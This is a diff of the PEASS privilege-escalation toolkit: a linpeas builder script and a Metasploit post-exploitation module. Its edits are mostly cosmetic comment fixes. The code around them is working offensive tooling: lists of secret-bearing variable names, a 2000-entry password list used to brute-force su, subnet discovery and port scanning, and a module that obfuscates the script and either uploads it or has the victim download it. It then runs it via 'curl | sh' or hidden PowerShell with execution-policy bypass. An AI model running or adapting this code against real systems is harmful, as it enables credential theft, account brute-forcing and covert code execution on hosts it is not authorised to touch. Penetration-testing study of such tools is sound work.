pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID"
pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID"
@ -489,9 +489,9 @@ katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat
charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals \
andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive \
plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude"
PASSTRY="2000" #Default num of passwds to try (all by default)
PASSTRY="2000" # Default num of passwds to try (all by default)
if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this
if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi # If Network reduce the time on this
SEDOVERFLOW=true
for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do
wgroups="$wgroups -group $grp -or "
@ -513,9 +513,9 @@ while $SEDOVERFLOW; do
if [ $? -eq 0 ]; then
SEDOVERFLOW=false
else
MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1
MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) # If overflow of directories, check again with MAXPATH_FIND_W - 1
fi
if [ $MAXPATH_FIND_W -lt 1 ] ; then # prevent infinite loop
if [ $MAXPATH_FIND_W -lt 1 ] ; then # Prevents infinite loop
SEDOVERFLOW=false
fi
done
@ -691,20 +691,20 @@ print_2title(){
START_T2_TIME=$(date +%s 2>/dev/null)
fi
printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC #There are 10 "═"
printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC # There are 10 "═"
}
print_3title(){
printf ${BLUE}"══╣ $GREEN$1\n"$NC #There are 2 "═"
printf ${BLUE}"══╣ $GREEN$1\n"$NC # There are 2 "═"
}
print_3title_no_nl(){
printf "\033[2K\r"
printf ${BLUE}"══╣ $GREEN${1}..."$NC #There are 2 "═"
printf ${BLUE}"══╣ $GREEN${1}..."$NC # There are 2 "═"
}
print_list(){
printf ${BLUE}"═╣ $GREEN$1"$NC #There is 1 "═"
printf ${BLUE}"═╣ $GREEN$1"$NC # There is 1 "═"
}
print_info(){
@ -713,7 +713,7 @@ print_info(){
print_ps (){
(ls -d /proc/*/ 2>/dev/null | while read f; do
CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); #Delete my own sed processess
CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); # Delete my own sed processess
if [ "$CMDLINE" ];
then var USER2=ls -ld $f | awk '{print $3}'; PID=$(echo $f | cut -d "/" -f3);
printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE";
@ -733,14 +733,14 @@ su_try_pwd (){
su_brute_user_num (){
BFUSER=$1
TRIES=$2
su_try_pwd "$BFUSER" "" & #Try without password
su_try_pwd "$BFUSER" "$BFUSER" & #Try username as password
su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & #Try reverse username as password
su_try_pwd "$BFUSER" "" & # Try without password
su_try_pwd "$BFUSER" "$BFUSER" & # Try username as password
su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & # Try reverse username as password
if [ "$PASSWORD" ]; then
su_try_pwd "$BFUSER" "$PASSWORD" & #Try given password
su_try_pwd "$BFUSER" "$PASSWORD" & # Try given password
fi
for i in $(seq "$TRIES"); do
su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & #Try TOP TRIES of passwords (by default 2000)
su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & # Try TOP TRIES of passwords (by default 2000)
sleep 0.007 # To not overload the system
done
wait
@ -796,8 +796,8 @@ check_tcp_443(){
check_icmp(){
(timeout -s KILL 20 /bin/bash -c '(ping -c 1 1.1.1.1 | grep "1 received" && echo "Ping is available" || echo "Ping is not available") 2>/dev/null | grep "available"') 2>/dev/null || echo "Ping is not available"
}
#DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp
#I cannot use this function because timeout doesn't find it, so it's copy/pasted below
# DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp
# I cannot use this function because timeout doesn't find it, so it's copy/pasted below
check_dns(){
(timeout 20 /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' ) 2>/dev/null || echo "DNS not available"
}
@ -814,7 +814,7 @@ basic_net_info(){
}
select_nc (){
#Select the correct configuration of the netcat found
# Select the correct configuration of the netcat found
NC_SCAN="$FOUND_NC -v -n -z -w 1"
$($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1)
if [ $? -eq 2 ]
@ -824,7 +824,7 @@ select_nc (){
}
icmp_recon (){
#Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses)
# Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses)
IP3=$(echo $1 | cut -d "." -f 1,2,3)
(timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") &
@ -837,7 +837,7 @@ icmp_recon (){
}
tcp_recon (){
#Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones
# Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones
IP3=$(echo $1 | cut -d "." -f 1,2,3)
PORTS=$2
printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " "
@ -857,7 +857,7 @@ tcp_recon (){
}
tcp_port_scan (){
#Scan open ports of a host. Default: nmap top 1000, but the user can select others
# Scan open ports of a host. Default: nmap top 1000, but the user can select others
basic_net_info
print_title "Network Port Scanning"
@ -885,7 +885,7 @@ tcp_port_scan (){
}
discover_network (){
#Check if IP and Netmask are correct and the use fping or ping to find hosts
# Check if IP and Netmask are correct and the use fping or ping to find hosts
basic_net_info
print_title "Network Discovery"
@ -900,11 +900,11 @@ discover_network (){
exit 0
fi
#Using fping if possible
# Using fping if possible
if [ "$FPING" ]; then
$FPING -a -q -g "$DISCOVERY" | sed -${E} "s,.*,${SED_RED},"
#Loop using ping
# Loop using ping
else
if [ "$NETMASK" -eq "24" ]; then
printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC"
@ -927,7 +927,7 @@ discover_network (){
discovery_port_scan (){
basic_net_info
#Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389
# Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389
print_title "Internal Network Discovery - Finding hosts and scanning ports"
DISCOVERY=$1
MYPORTS=$2
@ -946,7 +946,7 @@ discovery_port_scan (){
fi
PORTS="22 80 443 445 3389 $(echo $MYPORTS | tr ',' ' ')"
PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) #Delete repetitions
PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) # Delete repetitions
if [ "$NETMASK" -eq "24" ]; then
printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC
@ -1040,7 +1040,7 @@ if [ "$PORTS" ]; then
printf ${BLUE}"$HELP"$NC;
exit 0
else
#Select the correct configuration of the netcat found
# Select the correct configuration of the netcat found
select_nc
fi
else
@ -1084,12 +1084,12 @@ if [ "$PORT_FORWARD" ]; then
exit 0
fi
#Check if LOCAL_PORT is a number
# Check if LOCAL_PORT is a number
if ! [ "$(echo $LOCAL_PORT | grep -E '^[0-9]+$')" ]; then
printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
fi
#Check if REMOTE_PORT is a number
# Check if REMOTE_PORT is a number
if ! [ "$(echo $REMOTE_PORT | grep -E '^[0-9]+$')" ]; then
printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
fi
@ -1099,7 +1099,7 @@ if [ "$PORT_FORWARD" ]; then
fi
#Get HOMESEARCH
# Get HOMESEARCH
if [ "$SEARCH_IN_FOLDER" ]; then
HOMESEARCH="${ROOT_FOLDER}home/ ${ROOT_FOLDER}Users/ ${ROOT_FOLDER}root/ ${ROOT_FOLDER}var/www/"
else
@ -1139,7 +1139,7 @@ elif echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | g
fi
if [ "$SEARCH_IN_FOLDER" ] || echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then
#GENERATE THE STORAGES OF THE FOUND FILES
# GENERATE THE STORAGES OF THE FOUND FILES
peass{STORAGES_HERE}
##### POST SEARCH VARIABLES #####

26
metasploit/peass.rb
View File

@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post
'Name' => 'Multi PEASS launcher',
'Description' => %q{
This module will launch the indicated PEASS (Privilege Escalation Awesome Script Suite) script to enumerate the system.
You need to indicate the URL or local path to LinPEAS if you are in some Unix or to WinPEAS if you are in Windows.
You need to indicate the URL or local path to LinPEAS if you are on any Unix-based system or to WinPEAS if you are on Windows.
By default this script will upload the PEASS script to the host (encrypted and/or encoded) and will load, deobfuscate, and execute it.
You can configure this module to download the encrypted/encoded PEASS script from this metasploit instance via HTTP instead of uploading it.
},
@ -52,18 +52,18 @@ class MetasploitModule < Msf::Post
end
def run
ps_var1 = rand(36**5).to_s(36) #Winpeas PS needed variable
ps_var1 = rand(36**5).to_s(36) # Winpeas PS needed variable
# Load PEASS script in memory
peass_script = load_peass()
print_good("PEASS script successfully retreived.")
print_good("PEASS script successfully retrieved.")
# Obfuscate loaded PEASS script
if datastore["PASSWORD"].length > 1
# If no Windows, check if openssl exists
if !session.platform.include?("win")
openssl_path = cmd_exec("command -v openssl")
raise 'openssl not found in victim, unset the password of the module!' unless openssl_path.include?("openssl")
raise 'openssl not found on victim, unset the password of the module!' unless openssl_path.include?("openssl")
end
# Get encrypted PEASS script in B64
@ -82,7 +82,7 @@ class MetasploitModule < Msf::Post
# As the PS function is only capable of decrypting readable strings
# in Windows we encrypt the B64 of the binary and then load it in memory
# from the initial B64. Then: original -> B64 -> encrypt -> B64
aes_enc_peass_ret = aes_enc_peass(Base64.encode64(peass_script)) #Base64 before encrypting it
aes_enc_peass_ret = aes_enc_peass(Base64.encode64(peass_script)) # Base64 before encrypting it
peass_script_64 = aes_enc_peass_ret["encrypted"]
key_b64 = aes_enc_peass_ret["key_b64"]
iv_b64 = aes_enc_peass_ret["iv_b64"]
@ -97,7 +97,7 @@ class MetasploitModule < Msf::Post
# If no Windows, check if base64 exists
if !session.platform.include?("win")
base64_path = cmd_exec("command -v base64")
raise 'base64 not found in victim, set a 32B length password!' unless base64_path.include?("base64")
raise 'base64 not found on victim, set a 32B length password!' unless base64_path.include?("base64")
end
# Encode PEASS script
@ -137,7 +137,7 @@ class MetasploitModule < Msf::Post
upload_file(temp_path, file.path)
print_good("Uploaded")
#Start the cmd, prepare to read from the uploaded file
# Start the cmd, prepare to read from the uploaded file
if session.platform.include?("win")
cmd = "$ProgressPreference = 'SilentlyContinue'; $#{ps_var1} = Get-Content -Path #{temp_path};"
last_cmd = "del #{temp_path};"
@ -146,7 +146,7 @@ class MetasploitModule < Msf::Post
last_cmd = " ; rm #{temp_path}"
end
# Instead of writting the file to disk, download it from HTTP
# Instead of writing the file to disk, download it from HTTP
else
last_cmd = ""
# Start HTTP server
@ -159,13 +159,13 @@ class MetasploitModule < Msf::Post
url_download_peass = http_protocol + http_ip + http_port + http_path
print_good("Listening in #{url_download_peass}")
# Configure the download of the scrip in Windows
# Configure the download of the script in Windows
if session.platform.include?("win")
cmd = "$ProgressPreference = 'SilentlyContinue';"
cmd += get_bypass_tls_cert()
cmd += "$#{ps_var1} = Invoke-WebRequest \"#{url_download_peass}\" -UseBasicParsing | Select-Object -ExpandProperty Content;"
# Configure the download of the scrip in unix
# Configure the download of the script in Unix
else
cmd = "curl -k -s \"#{url_download_peass}\""
curl_path = cmd_exec("command -v curl")
@ -193,7 +193,7 @@ class MetasploitModule < Msf::Post
tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"].to_i)
# If unix, then, suppose linpeas was loaded
# If Unix, then, suppose linpeas was loaded
else
cmd += "| #{decode_linpeass_cmd}"
cmd += "| sh -s -- #{datastore['PARAMETERS']}"
@ -259,7 +259,7 @@ class MetasploitModule < Msf::Post
end
def aes_enc_peass(peass_script)
# Encrypt the PEASS script with aes
# Encrypt the PEASS script with AES (CBC Mode)
key = datastore["PASSWORD"]
iv = OpenSSL::Cipher::Cipher.new('aes-256-cbc').random_iv
@ -333,7 +333,7 @@ function DecryptStringFromBytesAes([String] $key, [String] $iv, [String] $encryp
$csDecrypt = new-object System.Security.Cryptography.CryptoStream($msDecrypt, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
$srDecrypt = new-object System.IO.StreamReader($csDecrypt)
#Write all data to the stream.
# Write all data to the stream.
$plainText = $srDecrypt.ReadToEnd()
$srDecrypt.Close()
$csDecrypt.Close()